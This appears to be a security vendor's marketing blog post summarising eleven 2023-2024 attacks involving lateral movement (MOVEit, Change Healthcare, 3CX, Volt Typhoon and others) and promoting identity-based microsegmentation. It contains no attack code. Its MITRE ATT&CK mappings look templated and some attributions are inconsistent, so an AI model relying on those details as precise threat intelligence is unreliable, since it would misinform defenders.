The Top 11 Cyberattacks Using Lateral Movement: A 2023-2024 Analysis for Enterprise Security Leaders

Preventing Lateral Movement is a Key Strategy for 2025

The modern cyber threat landscape is evolving rapidly, with attackers constantly finding new ways to breach enterprise networks. Among their most insidious tactics is lateral movement, a method that allows adversaries to infiltrate, explore, and exploit interconnected systems while evading detection.

Lateral movement poses a significant risk, especially for organizations managing vast digital ecosystems with thousands of devices. With over 70% of successful breaches leveraging lateral movement techniques, (like Ransomware, Malware) enterprises must take proactive measures to protect their networks. The financial stakes are immense: a single breach can cost millions in lost revenue, operational disruption, and compliance fines.

For large organizations—those with over 3,000 users and/or devices—this issue is more pressing than ever. In this post, we'll explore 11 notable cyberattacks from 2023-2024 where lateral movement played a central role and examine how modern solutions, like microsegmentation, can mitigate this risk.

Understanding Lateral Movement in Modern Enterprise Networks

Lateral movement refers to the techniques attackers use to navigate through a network after gaining initial access. Unlike perimeter-focused attacks, lateral movement allows threat actors to escalate privileges, access sensitive data, and deploy payloads, all while avoiding detection.

Key attack patterns include:

• Credential Harvesting: Techniques like Pass-the-Hash enable attackers to exploit legitimate credentials
• Remote Services Exploitation: Misused protocols like RDP and SMB provide entry points for lateral movement
• Living Off the Land: Attackers leverage built-in tools, such as PowerShell, to blend in with normal operations

Traditional security measures, including firewalls and antivirus tools, often fail to prevent or detect these sophisticated tactics. Scaling traditional firewalls to effectively prevent lateral movement is challenging because they are primarily designed to monitor and control traffic at the network perimeter, lacking the granular visibility and control required to manage internal east-west traffic within modern, dynamic enterprise environments. With an average detection time of 95 days, the consequences for enterprises can be catastrophic, especially in manufacturing, healthcare, and critical infrastructure sectors.

Notable Cyberattacks Utilizing Lateral Movement (2023-2024)

MOVEit Transfer Vulnerability Exploitation (2023)

• Attack Name/Family: MOVEit Transfer Vulnerability (CVE-2023-34362)
• Source: Unknown threat actors exploiting a SQL injection vulnerability
• Affected Organizations: Multiple organizations using MOVEit Transfer for secure file transfers
• Description: In 2023, attackers exploited a SQL injection vulnerability in the MOVEit Transfer tool, allowing them to send specially crafted HTTP requests to manipulate database queries. This enabled unauthorized access to sensitive data and facilitated lateral movement within affected networks.
• MITRE ATT&CK Tactics: Initial Access (T1190), Execution (T1059), Persistence (T1078), Privilege Escalation (T1068), Defense Evasion (T1070), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041)
• Reference: https://cloud.google.com/blog/topics/threat-intelligence/zero-day-moveit-data-theft 

BlackCat/ALPHV Ransomware Attack on Change Healthcare (2024)

• Attack Name/Family: BlackCat/ALPHV Ransomware
• Source: BlackCat/ALPHV ransomware group
• Affected Organizations: Change Healthcare
• Description: In February 2024, the BlackCat ransomware group infiltrated Change Healthcare's systems, utilizing stolen credentials to move laterally across the network. They deployed ransomware to encrypt files and exfiltrated sensitive data to pressure the organization into paying a ransom. The attack resulted in widespread disruption to healthcare operations and a reported ransom payment of approximately $22 million.
• MITRE ATT&CK Tactics: Initial Access (T1078), Execution (T1059), Persistence (T1136), Privilege Escalation (T1068), Defense Evasion (T1027), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041), Impact (T1486)
• Reference: https://krebsonsecurity.com/2024/03/blackcat-ransomware-group-implodes-after-apparent-22m-ransom-payment-by-change-healthcare/ 

3CX Supply Chain Attack (2023)

• Attack Name/Family: 3CX Supply Chain Attack
• Source: Suspected North Korean Lazarus Group
• Affected Organizations: Users of 3CX Phone System across various industries
• Description: In March 2023, attackers compromised the 3CX Phone System's software supply chain, inserting malware into both Mac OS and Microsoft installers. Once installed, the malware allowed attackers to move laterally within networks, deploying the Gopuram backdoor to exfiltrate data and maintain persistence.
• MITRE ATT&CK Tactics: Initial Access (T1195), Execution (T1059), Persistence (T1136), Privilege Escalation (T1068), Defense Evasion (T1070), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041)
• Reference: https://www.crowdstrike.com/blog/3cx-supply-chain-attack-technical-analysis-and-remediation-guidance/ 

Volt Typhoon Campaign (2023-2024)

• Attack Name/Family: Volt Typhoon
• Source: Chinese state-sponsored hackers
• Affected Organizations: U.S. critical infrastructure sectors, including power grids and transportation hubs
• Description: Since 2019, the Volt Typhoon group has infiltrated various U.S. infrastructure targets. They utilized outdated routers and unpatched software vulnerabilities to gain initial access and then moved laterally within networks to conduct espionage and prepare for potential disruptive activities.
• MITRE ATT&CK Tactics: Initial Access (T1078), Execution (T1059), Persistence (T1136), Privilege Escalation (T1068), Defense Evasion (T1070), Credential Access (T1003), Discovery (T1083), Lateral Movement (T1021), Collection (T1114), Exfiltration (T1041)
• Reference: https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-u-s-critical-infrastructure-with-living-off-the-land-techniques/ 

LockBit Ransomware Attacks (2023-2024)

• Attack Name/Family: LockBit Ransomware
• Source: LockBit ransomware group
• Affected Organizations: Various organizations across multiple sectors globally
• Description: LockBit ransomware continued its operations into 2023 and 2024, targeting organizations worldwide. The attackers often gained initial access through phishing emails or exploiting unpatched vulnerabilities, then moved laterally within networks using tools like Mimikatz to harvest credentials and PsExec for remote execution. Between January 2020 and May 2023, LockBit was responsible for approximately 1,700 ransomware attacks in the U.S., with $91 million paid in ransom.
• MITRE ATT&CK Tactics: Initial Access: Exploit Public-Facing Application (T1190), Execution: Command and Scripting Interpreter (T1059), Persistence: Server Software Component (T1505), Privilege Escalation: Exploitation for Privilege Escalation (T1068), Defense Evasion: Obfuscated Files or Information (T1027), Credential Access: Unsecured Credentials (T1552), Discovery System Information Discovery (T1082), Lateral Movement: Remote Services (T1021), Collection: Data from Information Repositories (T1213), Exfiltration: Exfiltration Over Web Service (T1567)
• Reference: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a 

PyPI Supply Chain Attack (2024)

• Attack Name/Family: JarkaStealer Malware
• Source: Unknown threat actors
• Affected Organizations: Developers and organizations utilizing compromised Python packages
• Description: In 2024, attackers uploaded malicious packages to the Python Package Index (PyPI), a repository widely used by developers. These packages contained JarkaStealer malware, which, once installed, allowed attackers to move laterally within the developer's environment, exfiltrating sensitive information such as credentials and intellectual property.
• MITRE ATT&CK Tactics: Supply Chain Compromise (T1195), User Execution (T1204), Boot or Logon Autostart Execution (T1547), Exploitation for Privilege Escalation (T1068), Obfuscated Files or Information (T1027), Input Capture (T1056), System Information Discovery (T1082), Remote Services (T1021), Data from Local System (T1005), Exfiltration Over C2 Channel (T1041)
• Reference: https://blog.sonatype.com/pypi-supply-chain-attack-exposes-open-source-ecosystem-vulnerabilities 

NKAbuse Malware Campaign (2023)

• Attack Name/Family: NKAbuse Malware
• Source: Unknown threat actors
• Affected Organizations: Various organizations across multiple sectors
• Description: Discovered in 2023, NKAbuse is a sophisticated multiplatform malware written in Go, leveraging blockchain technology for its peer-to-peer communication infrastructure. After initial infection, the malware allowed attackers to move laterally within networks, conducting DDoS attacks and maintaining persistent access across different platforms, including Windows and Linux systems.
• MITRE ATT&CK Tactics and Techniques: Exploit Public-Facing Application (T1190), Command and Scripting Interpreter (T1059), Server Software Component (T1505), Exploitation for Privilege Escalation (T1068), Obfuscated Files or Information (T1027), OS Credential Dumping (T1003), System Information Discovery (T1082), Remote Services (T1021), Data from Local System (T1005), Exfiltration Over C2 Channel (T1041)
• Reference: https://securelist.com/nkabuse-north-korean-malware-campaign/104583/ 

Triangulation Spyware Campaign (2023)

• Attack Name/Family: Triangulation Spyware
• Source: Advanced Persistent Threat (APT) group
• Affected Organizations: Individuals and organizations using iOS devices
• Description: In 2023, the Triangulation spyware campaign targeted iOS devices by exploiting zero-day vulnerabilities. The malware enabled lateral movement by accessing encrypted communications, GPS locations, and other sensitive data, allowing attackers to monitor and exfiltrate information from various applications.
• MITRE ATT&CK Tactics and Techniques: Exploit Public-Facing Application (T1190), Command and Scripting Interpreter (T1059), Boot or Logon Autostart Execution (T1547), Exploitation for Privilege Escalation (T1068), Obfuscated Files or Information (T1027), Input Capture (T1056), System Information Discovery (T1082), Remote Services (T1021), Data from Local System (T1005), Exfiltration Over C2 Channel (T1041)
• Reference: https://securelist.com/operation-triangulation/109120/ 

EastWind Campaign (2024)

• Attack Name/Family: EastWind Campaign utilizing CloudSorcerer, GrewApacha, and PlugX malware
• Source: Attributed to Chinese state-sponsored groups APT31 and APT27
• Affected Organizations: Russian government agencies and IT companies
• Description: In late July 2024, the EastWind campaign targeted Russian entities using phishing emails containing malicious shortcut attachments. Upon execution, these attachments deployed multiple malware tools to move laterally within networks, exfiltrate sensitive data, and maintain persistent access.
• MITRE ATT&CK Tactics and Techniques: Initial Access: Spear Phishing Attachment (T1566.001), Execution: User Execution (T1204), Persistence: Registry Run Keys / Startup Folder (T1547.001), Privilege Escalation: Process Injection (T1055), Defense Evasion: Obfuscated Files or Information (T1027), Credential Access: Credential Dumping (T1003), Discovery: System Information Discovery (T1082), Lateral Movement: Remote Services (T1021), Collection: Data from Local System (T1005), Exfiltration: Exfiltration Over C2 Channel (T1041)
• Reference:  https://securelist.com/eastwind-apt-campaign/113345/

Johnson Controls Ransomware Attack (2023)

• Attack Name/Family: Dark Angels Ransomware
• Source: Dark Angels hacking group
• Affected Organizations: Johnson Controls, a technology provider specializing in smart and sustainable buildings
• Description: In late September 2023, Johnson Controls experienced a ransomware attack where the Dark Angels group demanded a $51 million ransom. The attackers claimed to have stolen approximately 27 terabytes of data and encrypted the company's ESXi servers, demonstrating sophisticated lateral movement capabilities within the network.
• MITRE ATT&CK Tactics and Techniques: Initial Access: Valid Accounts (T1078), Execution: Command and Scripting Interpreter (T1059), Persistence: Account Manipulation (T1098), Privilege Escalation: Exploitation for Privilege Escalation (T1068), Defense Evasion: Obfuscated Files or Information (T1027), Credential Access: OS Credential Dumping (T1003), Discovery: System Information Discovery (T1082), Lateral Movement: Remote Services (T1021), Collection: Data from Local System (T1005), Exfiltration: Exfiltration Over C2 Channel (T1041), Impact: Data Encrypted for Impact (T1486)
• Reference: https://www.bleepingcomputer.com/news/security/johnson-controls-hit-by-ransomware-attack-disrupting-operations/ 

Kroll Cybersecurity Data Breach (2023)

• Attack Name/Family: SIM Swapping Attack
• Source: Unknown Threat Actors
• Affected Organizations: Kroll, a leading global provider of risk and financial advisory solutions
• Description: In August 2023, attackers used a sophisticated SIM swapping technique to gain unauthorized access to Kroll's systems. Once inside, they employed lateral movement tactics to access email and sensitive communications, impacting multiple high-profile clients involved in legal disputes. The attackers exploited weak multi-factor authentication (MFA) methods to escalate privileges and evade detection. While the financial impact remains undisclosed, the breach resulted in significant reputational damage and legal implications for both Kroll and its clients. In response, Kroll implemented enhanced MFA practices and internal monitoring systems to prevent similar attacks.
• Reference: https://techcrunch.com/2023/08/29/kroll-cyber-breach-sim-swapping/ 

Key Lessons from Recent Attacks

The analysis of recent cyberattacks reveals critical patterns and vulnerabilities that enterprises must address to prevent lateral movement. One prominent lesson is the recurring exploitation of unpatched systems. Many of the highlighted attacks leveraged known vulnerabilities, emphasizing the urgent need for regular and proactive patch management. Another key insight is the reliance on credential harvesting and misuse, demonstrating that weak or improperly managed authentication mechanisms continue to be a significant entry point for attackers.

Industry-specific impacts also provide valuable lessons. Manufacturing and healthcare sectors, with their unique integrations of IT and OT systems, face heightened risks. Attackers in these environments often exploit interconnections to compromise both digital and physical processes. Similarly, critical infrastructure organizations must contend with regulatory requirements that demand segmentation and monitoring to prevent lateral movement.

Modern Approaches to Preventing Lateral Movement

Preventing lateral movement requires a departure from traditional security models, which often rely on static boundaries and implicit trust. Instead, modern approaches emphasize dynamic and adaptive security measures. Identity-based microsegmentation has emerged as a leading strategy, enabling organizations to enforce least-privilege access across users, devices, and workloads. By dynamically adapting policies based on identity and context, this approach ensures that only authorized entities can interact with critical systems.

Zero Trust architecture also plays a pivotal role in mitigating lateral movement risks. By continuously verifying all access requests and assuming that no entity is inherently trustworthy, Zero Trust creates robust barriers to lateral movement. Integrating these modern approaches with existing security infrastructure, such as SIEM and EDR platforms, further strengthens an organization's defenses.

The Power of Identity-Based Microsegmentation

Identity-based microsegmentation represents a transformative leap forward in network security. Unlike traditional segmentation methods that rely on rigid network constructs, identity-based microsegmentation dynamically segments the network based on the attributes of users, workloads, and devices. Elisity's platform exemplifies this innovation through its Elisity IdentityGraph™ technology, which correlates metadata from across the network and metadata sources to create comprehensive, real-time insights into all connected entities.

This approach empowers enterprises to enforce granular security policies without disrupting operations. By decoupling access controls from underlying network infrastructure, Elisity's solution simplifies implementation while delivering unparalleled visibility and control. Organizations can effectively contain threats, minimize the blast radius of attacks, and ensure compliance with regulatory requirements. Identity-based microsegmentation is not just a security enhancement—it is a foundational component of a resilient cybersecurity strategy.

Implementation Strategy and Best Practices

Implementing a successful lateral movement prevention strategy requires a holistic approach encompassing people, processes, technology, and compliance. From a people perspective, cross-functional collaboration is essential. Security architects, network engineers, and compliance officers must work together to design and implement effective policies. Training and upskilling these teams ensure they are equipped to manage advanced microsegmentation platforms.

The process should begin with a thorough assessment of the organization's current security posture. Identifying critical assets and high-risk areas allows teams to prioritize their efforts. A phased implementation approach is often most effective, starting with the most vulnerable systems and gradually expanding to cover the entire network. This methodology minimizes disruption and provides opportunities to refine policies as the deployment scales.

From a technology standpoint, leveraging solutions like Elisity's platform simplifies deployment and management. By integrating seamlessly with existing infrastructure, Elisity reduces complexity while enhancing security. Compliance considerations must also be central to the strategy, ensuring that policies align with frameworks like NIST, IEC 62443, and HIPAA. Together, these elements create a robust framework for preventing lateral movement and protecting enterprise networks from evolving threats.

Next Steps

The rise in sophisticated cyberattacks utilizing lateral movement techniques underscores the critical need for modern security approaches. Identity-based microsegmentation, combined with Zero Trust principles, provides organizations with the tools they need to protect their expanding digital ecosystems. By learning from recent attacks and implementing comprehensive security strategies, enterprises can better defend against threats while maintaining operational efficiency.

Ready to enhance your organization's defense against lateral movement attacks? Contact Elisity today to learn how our identity-based microsegmentation platform can strengthen your security posture.